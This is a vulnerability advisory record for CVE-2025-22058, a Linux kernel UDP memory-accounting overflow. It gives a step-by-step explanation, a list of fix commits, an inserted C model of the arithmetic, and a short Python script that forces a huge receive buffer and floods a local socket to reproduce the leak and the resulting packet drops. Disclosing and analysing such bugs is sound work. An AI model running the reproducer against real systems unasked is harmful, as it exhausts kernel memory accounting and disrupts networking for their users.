CVE-2025-22058

Source
https://cve.org/CVERecord?id=CVE-2025-22058
Import Source
https://storage.googleapis.com/osv-test-cve-osv-conversion/osv-output/CVE-2025-22058.json
JSON Data
https://api.test.osv.dev/v1/vulns/CVE-2025-22058
Downstream
Related
Published
2025-04-16T14:12:14.876Z
Modified
2026-03-20T12:41:18.371630Z
Summary
udp: Fix memory accounting leak.
Details

In the Linux kernel, the following vulnerability has been resolved:

udp: Fix memory accounting leak.

Matt Dowling reported a weird UDP memory usage issue.

Under normal operation, the UDP memory usage reported in /proc/net/sockstat remains close to zero. However, it occasionally spiked to 524,288 pages and never dropped. Moreover, the value doubled when the application was terminated. Finally, it caused intermittent packet drops.

We can reproduce the issue with the script below [0]:

  1. /proc/net/sockstat reports 0 pages

    cat /proc/net/sockstat | grep UDP:

    UDP: inuse 1 mem 0

  2. Run the script till the report reaches 524,288

    python3 test.py & sleep 5

    cat /proc/net/sockstat | grep UDP:

    UDP: inuse 3 mem 524288 <-- (INT_MAX + 1) >> PAGE_SHIFT

  3. Kill the socket and confirm the number never drops

    pkill python3 && sleep 5

    cat /proc/net/sockstat | grep UDP:

    UDP: inuse 1 mem 524288

  4. (necessary since v6.0) Trigger proto_memory_pcpu_drain()

    python3 test.py & sleep 1 && pkill python3

  5. The number doubles

    cat /proc/net/sockstat | grep UDP:

    UDP: inuse 1 mem 1048577

The application set INT_MAX to SO_RCVBUF, which triggered an integer overflow in udp_rmem_release().

When a socket is close()d, udp_destruct_common() purges its receive queue and sums up skb->truesize in the queue. This total is calculated and stored in a local unsigned integer variable.

The total size is then passed to udp_rmem_release() to adjust memory accounting. However, because the function takes a signed integer argument, the total size can wrap around, causing an overflow.

Then, the released amount is calculated as follows:

  1) Add size to sk->sk_forward_alloc.
  2) Round down sk->sk_forward_alloc to the nearest lower multiple of PAGE_SIZE and assign it to amount.
  3) Subtract amount from sk->sk_forward_alloc.
  4) Pass amount >> PAGE_SHIFT to __sk_mem_reduce_allocated().

When the issue occurred, the total in udp_destruct_common() was 2147484480 (INT_MAX + 833), which was cast to -2147482816 in udp_rmem_release().

At 1) sk->sk_forward_alloc is changed from 3264 to -2147479552, and 2) sets -2147479552 to amount. 3) reverts the wraparound, so we don't see a warning in inet_sock_destruct(). However, udp_memory_allocated ends up doubling at 4).

Since commit 3cd3399dd7a8 ("net: implement per-cpu reserves for memory_allocated"), memory usage no longer doubles immediately after a socket is close()d because __sk_mem_reduce_allocated() caches the amount in udp_memory_per_cpu_fw_alloc. However, the next time a UDP socket receives a packet, the subtraction takes effect, causing UDP memory usage to double.

This issue makes further memory allocation fail once the socket's sk->sk_rmem_alloc exceeds net.ipv4.udp_rmem_min, resulting in packet drops.

To prevent this issue, let's use unsigned int for the calculation and call sk_forward_alloc_add() only once for the small delta.

Note that first_packet_length() also potentially has the same problem.

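[0]:

    from socket import *

    SO_RCVBUFFORCE = 33          # Linux socket option number
    INT_MAX = (2 ** 31) - 1

    # Receiver: bind to an ephemeral port and force the receive buffer to INT_MAX
    s = socket(AF_INET, SOCK_DGRAM)
    s.bind(('', 0))
    s.setsockopt(SOL_SOCKET, SO_RCVBUFFORCE, INT_MAX)

    # Sender: connect to the receiver, which never reads its queue
    c = socket(AF_INET, SOCK_DGRAM)
    c.connect(s.getsockname())

    data = b'a' * 100

    while True:
        c.send(data)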
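The accounting arithmetic described in the details above, modeled in user space as an added example (it is not kernel code and not taken from the fix commits). The struct, function names, 4 KiB page size and the starting counter of 524289 pages are assumptions made for the model; the total of 2147484480 and the forward-alloc value of 3264 are the figures quoted above.

```c
#include <stdint.h>
#include <stdio.h>

#define PAGE_SHIFT 12                  /* assumption: 4 KiB pages */
#define PAGE_SIZE  (1 << PAGE_SHIFT)

/* Hypothetical stand-in for the two counters the advisory talks about. */
struct model_sock {
    int32_t forward_alloc;             /* models sk->sk_forward_alloc (bytes) */
    int64_t pages_allocated;           /* models udp_memory_allocated (pages) */
};

/* Steps 1) to 4) from the advisory, with the size taken as a signed int. */
static void release_signed(struct model_sock *sk, int32_t size)
{
    int32_t amount;
    sk->forward_alloc += size;                       /* 1) */
    amount = sk->forward_alloc & ~(PAGE_SIZE - 1);   /* 2) */
    sk->forward_alloc -= amount;                     /* 3) */
    sk->pages_allocated -= amount >> PAGE_SHIFT;     /* 4) negative amount adds pages */
}

/* Same release in unsigned arithmetic, with one small delta applied. */
static void release_unsigned(struct model_sock *sk, uint32_t size)
{
    uint32_t sum = size + (uint32_t)sk->forward_alloc;
    uint32_t amount = sum & ~(uint32_t)(PAGE_SIZE - 1);
    sk->forward_alloc += (int32_t)(size - amount);   /* small remainder only */
    sk->pages_allocated -= amount >> PAGE_SHIFT;
}

/* Returns the modeled page counter after the socket's queue is released. */
int64_t pages_after_close(int use_unsigned, uint32_t total, int32_t fwd, int64_t pages)
{
    struct model_sock sk = { fwd, pages };
    if (use_unsigned)
        release_unsigned(&sk, total);
    else
        release_signed(&sk, (int32_t)total);  /* wraps negative above INT_MAX */
    return sk.pages_allocated;
}

int main(void)
{
    /* total and fwd are the advisory's numbers; 524289 pages is constructed */
    printf("signed:   %lld pages\n", (long long)pages_after_close(0, 2147484480u, 3264, 524289));
    printf("unsigned: %lld pages\n", (long long)pages_after_close(1, 2147484480u, 3264, 524289));
    return 0;
}
```

In the signed model the counter grows by 524287 pages instead of shrinking; in the unsigned model it returns to zero.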

Database specific
{
    "osv_generated_from": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2025/22xxx/CVE-2025-22058.json",
    "cna_assigner": "Linux"
}
References

Affected packages

Git / git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git

Affected ranges

Type
GIT
Repo
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git
Events
Introduced
f970bd9e3a06f06df8d8ecf1f8ad2c8615cc17eb
Fixed
13550273171f5108b1ac572d8f72f4256ab92854
Fixed
d9c8266ce536e8314d84370e983afcaa36fb19cf
Fixed
c3ad8c30b6b109283d2643e925f8e65f2e7ab34e
Fixed
9122fec396950cc866137af7154b1d0d989be52e
Fixed
aeef6456692c6f11ae53d278df64f1316a2a405a
Fixed
a116b271bf3cb72c8155b6b7f39083c1b80dcd00
Fixed
c4bac6c398118fba79e32b1cd01db22dbfe29fbf
Fixed
3836029448e76c1e6f77cc5fe0adc09b018b5fa8
Fixed
df207de9d9e7a4d92f8567e2c539d9c8c12fd99d

Database specific

source
"https://storage.googleapis.com/osv-test-cve-osv-conversion/osv-output/CVE-2025-22058.json"